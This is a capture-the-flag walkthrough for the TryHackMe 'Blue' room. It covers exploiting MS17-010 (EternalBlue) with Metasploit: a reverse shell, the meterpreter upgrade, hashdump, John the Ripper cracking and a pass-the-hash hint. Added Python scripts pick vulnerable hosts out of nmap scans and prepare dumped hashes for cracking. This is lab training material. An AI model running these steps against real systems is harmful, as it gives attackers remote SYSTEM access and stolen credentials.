# Red Team Training Series: An EternalBlue Saga

###### tags: `cybersecurity` `ms17-010` `eternalblue` `exploit` `SMB` `walkthrough` `blue`

This serves as a walkthrough for the room Blue on THM.

## Eternal Who?

EternalBlue is an exploit developed by the US National Security Agency that was leaked by the Shadow Brokers hacker group on April 14, 2017, one month after Microsoft had released the MS17-010 patches (March 14, 2017) for the vulnerability it targets.

**WannaCry** leveraged this exploit to attack unpatched computers on May 12, 2017. **NotPetya** leveraged it again on June 27, 2017.

The patch is years old, but you might still encounter unpatched hosts on your adventures.

## Eternal how?

EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol, fixed by the MS17-010 bulletin (the EternalBlue bug itself is CVE-2017-0144). The SMBv1 server driver (srv.sys) mishandles specially crafted transaction packets, which leads to a kernel-mode buffer overflow and lets an unauthenticated attacker run code as SYSTEM.

The exploit needs no credentials because these older SMB servers accept a null session (anonymous login). That is the precondition for reaching the bug, not the bug itself; hosts with SMBv1 disabled are not exploitable this way.

## msf all the way... partially anyway

Ping the host to make sure you can reach it, then scan it with nmap:

syntax: **nmap -sV -vv --script vuln [ip]**

![](https://i.imgur.com/PJ0kPrx.png)

The `smb-vuln-ms17-010` script output shows that the target might be vulnerable to ms17-010.

Search for the EternalBlue exploit in msf and run it:

1. **use exploit/windows/smb/ms17_010_eternalblue**
2. **set payload windows/x64/shell/reverse_tcp**
3. Set the options: at least **set RHOSTS [target ip]** and the LHOST.
4. Take note to set LHOST to your IP; if you're using a VPN, set it to your tun0 VPN address.
5. **check** confirms the target answers the MS17-010 probe as vulnerable before you fire a kernel exploit at it.
6. **run**. This is a kernel exploit: a failed attempt can blue-screen the target, and you may need to run it more than once before you get a session.
7. Once you get a session, background it with **Ctrl+Z**.
    ![](https://i.imgur.com/7VZ7VAM.png)
8. **use post/multi/manage/shell_to_meterpreter**
9. List sessions, syntax: **sessions -l**
10. Set the session option to the ID assigned to your shell session: **set session [i]**
11. **run**
    ![](https://i.imgur.com/iltyoN7.png)
12. Migrate the meterpreter shell to a more stable process, since you will use it to dump credentials later on.
13. **ps** to view all processes, noting the PID (process ID); target something running with SYSTEM-level permissions. Note that to migrate into a process you need the same or higher permissions. If you migrate to a process with lower permissions, you cannot reverse this action (you lose SYSTEM), so confirm who you are with **getuid** before and after.
14. **migrate [PID]**
    ![](https://i.imgur.com/qfg2U2Z.png)
15. **hashdump** to get the local SAM hashes (one `user:RID:LM hash:NT hash:::` line per account); copy them to a txt file.
16. Use John the Ripper to crack the NT hashes.
17. **john hashes.txt --format=NT --wordlist=rockyou.txt**
18. View cracked hashes: **john hashes.txt --format=NT --show**
    ![](https://i.imgur.com/JiqD3m6.png)

A good place to practice this is [tryhackme's blue room](https://tryhackme.com/room/blue).

A better understanding can be gotten from reading [null byte's article](https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/).

That's it for blue :)
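For the nmap scan step above, here is an added example (my own code, not from the original page or from nmap) that triages `nmap -sV -vv --script vuln` output when you have scanned more than one host: it pulls out the `smb-vuln-ms17-010` state and CVE IDs per host and separates hosts that answered as vulnerable from script errors and hosts that produced no result at all. The report text is constructed to mirror the format the NSE script prints; the state strings (`VULNERABLE`, `LIKELY VULNERABLE`, `NOT VULNERABLE`) are the ones nmap's vulns library uses.

```python
"""Triage `nmap -sV --script vuln` text output for MS17-010 across several hosts.

Added example for this walkthrough; not part of nmap or the original page.
SAMPLE_REPORT is constructed to mirror the smb-vuln-ms17-010 output format:
one vulnerable host, one script error, one host with 445 closed (no result).
"""
from __future__ import annotations
import re

SCRIPT = "smb-vuln-ms17-010"
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# First line of any NSE result: "| name: " (multi-line block) or "|_name: value" (one line).
NSE_RE = re.compile(r"^\|_?\s?([\w.-]+):\s*(.*)$")
STATE_RE = re.compile(r"State:\s*(.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")

SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.5
Host is up (0.021s latency).
PORT     STATE SERVICE      VERSION
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap scan report for 10.10.10.6
Host is up (0.019s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)

Nmap scan report for 10.10.10.7
Host is up (0.018s latency).
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
"""


def parse_ms17_010(report: str) -> dict[str, dict]:
    """Return {host: {"state": str, "cves": [str]}} for every host in a normal-output report."""
    results: dict[str, dict] = {}
    host = None
    in_block = False
    for line in report.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            results[host] = {"state": "no result", "cves": []}
            in_block = False
            continue
        if host is None:
            continue
        m = NSE_RE.match(line)
        if m:  # start of some script's result: is it ours?
            in_block = m.group(1) == SCRIPT
            if in_block and m.group(2).strip():
                # One-line result means the check did not run (e.g. "ERROR: ...").
                results[host]["state"] = m.group(2).strip()
            continue
        if in_block and line.startswith("|"):
            s = STATE_RE.search(line)
            if s:
                results[host]["state"] = s.group(1)
            for cve in CVE_RE.findall(line):
                if cve not in results[host]["cves"]:
                    results[host]["cves"].append(cve)
        elif not line.startswith("|"):
            in_block = False  # blank line or next section ends the block
    return results


def exploit_candidates(results: dict[str, dict]) -> list[str]:
    """Hosts worth pointing ms17_010_eternalblue at; errors and silence are not candidates."""
    return sorted(h for h, r in results.items()
                  if r["state"].startswith(("VULNERABLE", "LIKELY VULNERABLE")))


if __name__ == "__main__":
    parsed = parse_ms17_010(SAMPLE_REPORT)
    for h, r in parsed.items():
        print(f"{h:16} {r['state']:45} {' '.join(r['cves'])}")
    print("candidates:", exploit_candidates(parsed))
```

Save the scan with `-oN scan.txt` (nmap's normal output is this same text) and pass the file contents to `parse_ms17_010`. A host that errored or printed nothing is not "not vulnerable"; rerun it rather than skipping it.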
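For the hashdump and john steps, here is an added example (my own code, not from the original page, Metasploit or John the Ripper) that takes the `hashdump` output, flags accounts with a blank password (nothing to crack) and accounts that still store an LM hash, emits the pwdump lines for john, and maps the output of `john --show` back to usernames. The dump and the `--show` output are constructed: the hashes are well-known test values (the NT hash of `password` and of the empty string, plus a placeholder for Jon), not those of the THM target.

```python
"""Triage meterpreter `hashdump` output and prepare it for John the Ripper.

Added example for this walkthrough; not code from the original page,
Metasploit or John. SAMPLE_HASHDUMP and SAMPLE_JOHN_SHOW are constructed:
the hashes are well-known test values, not the THM target's.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# "No LM hash stored" placeholder and the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Well-known RIDs of built-in local accounts (RID 500 is the admin even if renamed).
BUILTIN_RIDS = {500: "Administrator", 501: "Guest", 503: "DefaultAccount", 504: "WDAGUtilityAccount"}
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)

SAMPLE_HASHDUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

# What `john hashes.txt --format=NT --show` prints: user:password:RID:LM:NT::: plus a summary.
SAMPLE_JOHN_SHOW = """\
Administrator:password:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::

1 password hash cracked, 1 left
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def blank_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def has_lm(self) -> bool:
        # A real LM hash means the box still stores the weak LM form: crack it with --format=LM.
        return self.lm != EMPTY_LM

    @property
    def builtin(self) -> bool:
        return self.rid in BUILTIN_RIDS

    def pwdump_line(self) -> str:
        return f"{self.user}:{self.rid}:{self.lm}:{self.nt}:::"


def parse_hashdump(text: str) -> list[Account]:
    """Keep only well-formed pwdump lines; status chatter from meterpreter is skipped."""
    accounts = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if m:
            accounts.append(Account(m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()))
    return accounts


def triage(accounts: list[Account]) -> dict[str, list[str]]:
    """Who to crack, who already has a blank password, who has an LM hash, who is built in."""
    return {
        "crack": [a.user for a in accounts if not a.blank_password],
        "blank": [a.user for a in accounts if a.blank_password],
        "lm": [a.user for a in accounts if a.has_lm],
        "builtin": [a.user for a in accounts if a.builtin],
    }


def john_input(accounts: list[Account]) -> str:
    """Contents for hashes.txt; blank-password accounts are dropped since there is nothing to crack."""
    return "".join(a.pwdump_line() + "\n" for a in accounts if not a.blank_password)


def parse_john_show(text: str) -> dict[str, str]:
    """Map user -> recovered password from `john --show` output (the password may contain ':')."""
    cracked = {}
    for line in text.splitlines():
        parts = line.rsplit(":", 6)  # "user:password", rid, lm, nt, "", "", ""
        if len(parts) == 7 and parts[1].isdigit() and ":" in parts[0]:
            user, password = parts[0].split(":", 1)
            cracked[user] = password
    return cracked


if __name__ == "__main__":
    accts = parse_hashdump(SAMPLE_HASHDUMP)
    print(triage(accts))
    print(john_input(accts), end="")
    print(parse_john_show(SAMPLE_JOHN_SHOW))
```

Cracking is optional for moving on: the NT hash is itself a credential, and Metasploit's `exploit/windows/smb/psexec` accepts `LM:NT` as `SMBPass` (pass-the-hash). If `triage` reports accounts under `lm`, run john a second time with `--format=LM`; the LM form breaks far faster than NT.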